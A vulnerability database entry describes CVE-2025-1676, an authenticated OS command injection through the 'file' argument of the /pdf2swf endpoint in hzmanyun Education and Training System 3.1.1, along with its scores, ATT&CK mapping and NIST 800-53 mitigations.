CVE-2025-1676
Published: 25 February 2025
Summary
CVE-2025-1676 is a medium-severity Command Injection (CWE-77) vulnerability in Hzmanyun Education And Training System. Its CVSS base score is 5.3 (Medium).
Operationally, exploitation aligns with the MITRE ATT&CK technique Exploit Public-Facing Application (T1190); ranked in the top 26.2% of CVEs by exploit likelihood; it is not currently listed in the CISA KEV catalog.
The strongest mitigations our analysis identified are NIST 800-53 SI-10 (Information Input Validation) and SI-2 (Flaw Remediation).
Deeper analysis
A vulnerability classified as critical exists in hzmanyun Education and Training System 3.1.1. It resides in the pdf2swf function of the /pdf2swf file, where manipulation of the file argument permits OS command injection. The issue is tracked under CWE-77 and CWE-78 and carries a CVSS 5.3 score reflecting network attack vector and low attack complexity.
The flaw can be exploited remotely by an authenticated attacker with low privileges, enabling execution of arbitrary operating system commands that affect confidentiality, integrity, and availability on the target system. Public exploit code has already been disclosed and may be used.
No vendor advisories or patch details appear in the referenced sources. The EPSS score shows only a minor peak and remains low overall.
EU & UK References
- 🇪🇺 ENISA EUVD: EUVD-2025-5446
Vulnerability details
A vulnerability classified as critical was found in hzmanyun Education and Training System 3.1.1. Affected by this vulnerability is the function pdf2swf of the file /pdf2swf. The manipulation of the argument file leads to os command injection. The attack can…
more
be launched remotely. The exploit has been disclosed to the public and may be used.
- CWE(s)
Related Threats
MITRE ATT&CK Enterprise TechniquesAI
Why these techniques?
OS command injection in remotely accessible pdf2swf endpoint directly enables exploitation of public-facing application (T1190) and arbitrary command execution via T1059.
CVEs Like This One
Affected Assets
Mitigating Controls
Mitigating Controls (NIST 800-53 r5) AI
Directly remediates the OS command injection vulnerability in the pdf2swf function by identifying, prioritizing, and applying patches or updates to the affected hzmanyun Education and Training System.
Prevents command injection by enforcing validation of the 'file' argument to the /pdf2swf endpoint, rejecting or sanitizing inputs that could contain malicious OS commands.
Limits the scope and impact of injected OS commands by enforcing least privilege on the process handling the pdf2swf function, restricting unauthorized actions even if exploitation occurs.